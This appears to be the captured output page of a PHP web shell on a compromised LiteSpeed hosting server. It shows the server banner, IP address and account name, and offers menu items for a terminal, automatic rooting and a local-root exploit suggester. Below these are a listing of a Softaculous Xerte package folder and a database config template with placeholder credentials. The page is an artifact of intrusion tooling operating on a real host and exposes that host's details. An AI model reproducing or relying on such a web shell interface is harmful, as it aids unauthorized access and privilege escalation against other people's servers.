Linux sea-business-23.hostwindsdns.com 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
LiteSpeed
Server IP : 104.168.155.189 & Your IP : 216.73.217.84
Domains :
Cant Read [ /etc/named.conf ]
User : zvmcccat
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
xerte /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2022-08-02 10:26
php53
[ DIR ]
drwxr-xr-x
2022-08-02 10:26
php56
[ DIR ]
drwxr-xr-x
2022-08-02 10:26
php71
[ DIR ]
drwxr-xr-x
2022-08-02 10:26
database.php
658
B
-rw-r--r--
2021-12-23 19:54
edit.php
4.73
KB
-rw-r--r--
2022-08-01 19:05
edit.xml
433
B
-rw-r--r--
2021-12-23 19:54
fileindex.php
1.18
KB
-rw-r--r--
2022-07-21 20:09
import.php
3.45
KB
-rw-r--r--
2022-08-01 19:05
info.xml
3.18
KB
-rw-r--r--
2022-08-01 17:48
install.js
924
B
-rw-r--r--
2021-12-23 19:54
install.php
4.36
KB
-rw-r--r--
2022-08-01 19:05
install.xml
963
B
-rw-r--r--
2021-12-23 19:54
md5
1.99
KB
-rw-r--r--
2022-08-01 19:05
notes.txt
261
B
-rw-r--r--
2021-12-23 19:54
upgrade.php
3.33
KB
-rw-r--r--
2022-08-01 19:05
upgrade.xml
392
B
-rw-r--r--
2021-12-23 19:54
Save
Rename
<?php /** * * database page, has the settings for database connection * * @author Patrick Lockley * @version 1.0 * @package */ /* * Database type */ $xerte_toolkits_site->database_type = 'mysql'; /* * Host where database is */ $xerte_toolkits_site->database_host = '[[softdbhost]]'; /* * Username for database */ $xerte_toolkits_site->database_username = '[[softdbuser]]'; /* * Password for database */ $xerte_toolkits_site->database_password = '[[softdbpass]]'; /* * Database name */ $xerte_toolkits_site->database_name = '[[softdb]]'; /* * Database table prefix */ $xerte_toolkits_site->database_table_prefix = '[[dbprefix]]';